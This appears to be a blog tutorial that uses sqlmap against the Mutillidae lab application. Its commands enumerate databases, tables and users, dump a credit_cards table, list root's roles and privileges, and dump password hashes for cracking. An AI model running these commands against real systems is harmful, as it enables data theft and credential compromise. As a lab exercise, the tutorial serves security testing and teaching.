SQLMAP – DB & User Operations

SQLMAP – Enumeration of Databases & Users from vulnerable web forms.

Sqlmap is a database assessment tool which pentesters & security researchers can use to enumerate databases of various types. Sqlmap automates a normal & advanced sql injection techniques and performs them on a regular form. Refer to the article on Introduction to SQLMAP for getting started. The following lab sessions are a continuation of the previous one on sqlmap. So I recommend you to go through that post before you proceed with this one unless you know what you are doing. Click Here for the 1st post.

Lab 1 : Database Enumeration

In this lab, we enumerate & dump an entire database from a vulnerable web application. For this we need the url or copied request to the form we are trying sql injection. In this lab I am using a request which was saved in a file. Refer here to see how to take this. Here the scenario is same as described in the referred link.

Step 1: Get All Databases

After the request is taken & saved as a file, we can proceed with sqlmap. If you find the page is not vulnerable, the banner grabbing wouldn’t have given exact results. So since the page is vulnerable, lets perform some attacks using sqlmap.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req <replace this with your filename> --dbs

sqlmap
Performing DB Enumeration

 

The output comes up with the list of databases in the remote server.

sqlmap
Databases in the remote server

 

Now that we have a list of databases, we can focus into one of them. For this, I am focusing on a database named mutillidae.

Step 2: Get tablesfrom the selected database.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -D mutillidae <replace with your db name> --tables

 

sqlmap
Enumerating Tables

Now we can see tables populating

sqlmap
Tables Populating
sqlmap
Tables Populating

 

Now that we have a list of tables residing inside the remote server, we can dump any one of them to our system. All details of the operations performed are automatically stored by sqlmap. For now let’s concentrate on the table named credit_cards.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -D mutillidae <replace with your db name> -T credit_cards <replace with your table> --dump
sqlmap
Dumping the target table

Now we can see the table on screen and a file will be automatically generated containing the contents of the table.

sqlmap
Table Contents

Lab 2 : User Enumeration

In this lab, we use the same request file to enumerate the database users. Sqlmap can detect users in the database server, their roles & privileges also.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req --users
sqlmap
Enumerating Users
sqlmap
A list of users present on the Database server

Now we have to select a target user from the list dumped on the screen. For this tutorial, I am selecting the root user. Let’s now see what are the roles assigned to the user root. Of course root user would have all roles & privileges but you can substitute the commands for other users.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --roles
sqlmap
Enumerating Roles
sqlmap
Roles of root user being displayed

Okay, Now let’s see the user’s previlages

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --privileges
sqlmap
Enumerating Privileges
sqlmap
List of Privileges for root user

Now for the best part, let’s see if we can get the password for the user. Yes sqlmap also does this for you, here is how:

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --passwords
sqlmap
Enumerating Passwords

In this operation sqlmap ask a couple of new questions. One is whether you want to store the hashes to a temporary file. Another one is whether you want to do a dictionary based attack right away. You can answer according to your wish.

sqlmap
Sqlmap Prompts

And finally what you came for, the password hashes. With this recovered, we can try it against any password cracker like JTR or online tools etc.

sqlmap
Password hashes being dumped to screen

 

So now you got an idea on how sqlmap helps you to automate sql injection, it’s capabilities and functionalities. All these can be put into practice extensively while performing Web Application Security Testing. As SQLi is the most widely found vulnerability in web applications, you can definitely use sqlmap to check out a no of various kinds of security issues & perform variety of tests swiftly. As I said earlier, I would like to repeat those words “Virtually, there is no Web application testing without sqlmap”.

Do Like & Share this article to show support.

Facebook Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: